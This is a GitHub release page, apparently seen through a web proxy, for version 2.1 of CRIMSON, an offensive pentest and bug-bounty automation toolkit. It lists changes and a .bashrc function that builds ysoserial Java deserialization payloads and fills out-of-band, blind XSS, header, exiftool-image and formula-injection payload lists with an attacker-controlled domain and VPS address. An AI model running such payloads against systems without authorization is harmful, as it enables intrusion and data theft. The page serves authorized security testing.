8000 Release CRIMSON v2.1 · Karmaz95/crimson · GitHub
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content

CRIMSON v2.1
Compare
Choose a tag to compare
@Karmaz95 Karmaz95 released this 31 Jan 21:54
· 185 commits to master since this release
v2.1
0f5cfe6

CHANGES:

  1. Narrowed down the "OR" list.
  2. Open Redirection testing now is only possible with the “-x” flag.
    • This is due to Burp Suite, which will find most OR vulns.
  3. GOAST - small code changes. Bugs patched and added concurrency.
  4. HBH testing function was removed from the default crimson_target workflow.
    • You can add those functions manually if you want.
  5. get_the_robots() output bug patched.
  6. Removed crimson_deserializator from crimson_exploit workflow
  7. Removed codeql function, if you want to use it, you have to manually add it to the workflow.
  8. No more prompt after the first run of the docker on CMSEEK
  9. New aliases in .bashrc
  10. Preinstalled fd and batcat

Addition in .bashrc:

### WORKING PATH
export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/go/bin:/root/go/bin:/root/tools/codeql:/root/tools/CRIMSON/:"
### PYTHON ALIAS
alias python="python2"
### CARGO
. /root/.cargo/env
### CRIMSON MANUAL - words [domain] [vps_ip] [port]
function words {
    # Java deserialization payload URLDNS (* swap the java path if does not work)
    java -jar /root/tools/CRIMSON/scripts/GOAST/ysoserial.jar URLDNS "http://$1" | base64 -w0 |sed "s/$/\n/g" > oob.fuzz
    # Preparing OOB payloadlist and copying it to the clipboard
    cat /root/tools/CRIMSON/words/exp/OOB | sed "s/domain_collab/$1/g" |sed "s/vps_ip/$2/g" >> oob.fuzz1
    cat oob.fuzz1 | sed "s/$2:80/$2:$3/g" >> oob.fuzz && rm oob.fuzz1
    cat /root/tools/CRIMSON/words/exp/BLIND_XSS | sed "s/domain_collab/$1/g" >> oob.fuzz
    # Preparing other wordlists and files to upload
    cat /root/tools/CRIMSON/words/bug >> bug.fuzz
    cat /root/tools/CRIMSON/words/exp/http_leaks | sed "s/domain_collab/$1/g" >> http_leaks
    cat /root/tools/CRIMSON/words/exp/bypass_ext >> bypass_ext
    cat /root/tools/CRIMSON/words/exp/BLIND_XSS | sed "s/domain_collab/$1/g" >> BLIND_XSS
    cat /root/tools/CRIMSON/words/exp/headers | sed "s/domain_collab/$1/g" >> headers.fuzz
    # Preparing upload
    mkdir upload
    cd upload
    cp /root/tools/CRIMSON/upload/* .
    cat exiftool.jpg | sed "s/domain_collab/$1/g" >> 123 && mv 123 exiftooldomain.jpg
    cat exiftool.jpg | sed "s/domain_collab/$2:$3/g" >> 123 && mv 123 exiftoolvps.jpg
    cat formula_injections.txt | sed "s/domain_collab/$1/g" |sed "s/vps_ip/$2/g" >> formula_injections1
    cat formula_injections1 | sed "s/$2:80/$2:$3/g" >> formula_injections.txt && rm formula_injections1
    cd ..
}
### FEROX ALIAS
alias ferox="feroxbuster ---extract-links --no-recursion --redirects --wordlist /root/tools/CRIMSON/words/dir -k -u"
### fdfind alias
alias fd="fdfind"
### batcat
alias bat="batcat"
### CD TO CRIMSON
alias crimson="cd /root/tools/CRIMSON"
Assets 2
Loading
0